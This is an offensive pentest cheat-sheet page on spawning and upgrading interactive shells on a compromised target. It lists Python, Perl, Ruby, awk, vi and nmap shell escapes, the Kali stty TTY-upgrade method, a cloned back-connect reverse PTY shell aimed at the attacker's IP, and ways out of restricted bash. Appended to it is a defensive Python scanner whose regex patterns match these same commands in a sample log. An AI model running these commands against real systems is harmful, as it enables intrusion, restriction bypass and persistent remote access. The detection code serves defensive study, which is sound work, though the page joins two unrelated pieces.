Hack$Notes
Spawning a Shell

Spawn a shell

The following commands can be used to spawn a shell once you have a foothold on the target.

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'

script -qc /bin/bash /dev/null

import os; os.system('/bin/bash')   # (From within the Python interpreter)
/bin/sh -i
perl -e 'exec "/bin/sh";'
exec "/bin/sh";               # (From within perl)
exec "/bin/sh"                # (From within ruby)
os.execute('/bin/sh')         # (From within lua)
/bin/bash -i
exec "/bin/sh"                # (From within IRB)
:!bash                        # (From within vi)
:set shell=/bin/bash:shell    # (From within vi)
!sh                           # (From within nmap --interactive)

Method:

=================== On Kali ===================
CTRL+z                <--- send the netcat connection to the background
stty raw -echo        <--- on your own terminal
fg                    <--- bring the netcat connection back to the foreground
stty -a               <--- make a note of rows and columns

=================== On Target ===================
export SHELL=bash 
export TERM=xterm-256color  OR  export TERM=xterm
stty rows 38             <--- from notes above.
stty columns 116         <--- from notes above.

Python PTY Shells

Clone the repo https://github.com/infodox/python-pty-shells.git

On Kali:
1) Edit tcp_pty_backconnect.py to set your IP and PORT
2) Transfer this file to the target.
3) python tcp_pty_shell_handler.py -b IP:PORT

On target:
1) python tcp_pty_backconnect.py

Escaping RBASH (Restricted Bash)

##############################################

ssh username@<IP-Address> -t "bash --noprofile"

##############################################

vi
:set shell=/bin/bash
:shell

##############################################

cd /home
echo $SHELL
ed
!'/bin/bash'
pwd

##############################################

awk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd

##############################################

perl -e 'system("/bin/bash");'
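As an added defender-side example (not part of these notes), the following Python scans a constructed process-execution log for the spawn, TTY-upgrade and rbash-escape commands listed above. It flags both the literal command lines and the "from within vi/awk/perl" case, where the tell is an editor or interpreter spawning a bare shell. The log format and every sample line are constructed assumptions for this example.

```python
import re
from typing import List, Optional, Tuple

# Constructed process-execution log, one event per line:
#   <time>|<user>|<parent command>|<command line>
# (assumed format; real sources would be auditd execve records,
#  osquery process_events, EDR telemetry, etc.)
SAMPLE_LOG = """\
10:01:02|www-data|bash|python -c 'import pty; pty.spawn("/bin/sh")'
10:01:09|www-data|sh|script -qc /bin/bash /dev/null
10:01:15|www-data|bash|stty raw -echo
10:02:30|alice|vi|/bin/bash
10:02:41|alice|awk|/bin/bash
10:02:50|alice|bash|perl -e 'exec "/bin/sh";'
10:03:00|bob|sshd|bash --noprofile
10:03:10|alice|bash|ls -la /home
10:03:12|alice|perl|/bin/sh
10:04:00|carol|bash|python3 -m http.server 8000
"""

# Command-line patterns derived from the commands listed on this page.
CMDLINE_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("python pty.spawn",          re.compile(r"pty\.spawn\(")),
    ("script -qc <shell>",        re.compile(r"\bscript\b.*\s-qc\s+\S*/(ba)?sh\b")),
    ("stty raw -echo (TTY upgrade)", re.compile(r"\bstty\b.*\braw\b.*-echo")),
    ("bash --noprofile (rbash escape)", re.compile(r"\bbash\b.*--noprofile")),
    ("exec \"/bin/sh\" in interpreter", re.compile(r"\bexec\s*\(?\s*[\"']/bin/(ba)?sh")),
    ("system()/os.execute() on a shell", re.compile(r"(os\.system|os\.execute|system)\([\"']/bin/(ba)?sh")),
]

# Editors and interpreters the page lists as shell-escape vehicles; a bare
# shell whose parent is one of these is the "From within ..." case.
ESCAPE_PARENTS = {"vi", "vim", "ed", "awk", "perl", "ruby", "lua",
                  "python", "python3", "irb", "nmap"}
SHELL_RE = re.compile(r"^(/bin/|/usr/bin/)?(ba)?sh\b(\s+-i)?$")


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Return (technique label, event line) for a suspicious event, else None."""
    _ts, _user, parent, cmdline = line.split("|", 3)
    for label, rx in CMDLINE_RULES:
        if rx.search(cmdline):
            return (label, line)
    if parent in ESCAPE_PARENTS and SHELL_RE.match(cmdline.strip()):
        return (f"shell spawned from within {parent}", line)
    return None


def scan_log(text: str) -> List[Tuple[str, str]]:
    """Run classify() over every non-empty line and collect the hits."""
    return [hit for hit in (classify(l) for l in text.splitlines() if l) if hit]
```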

Last updated 3 years ago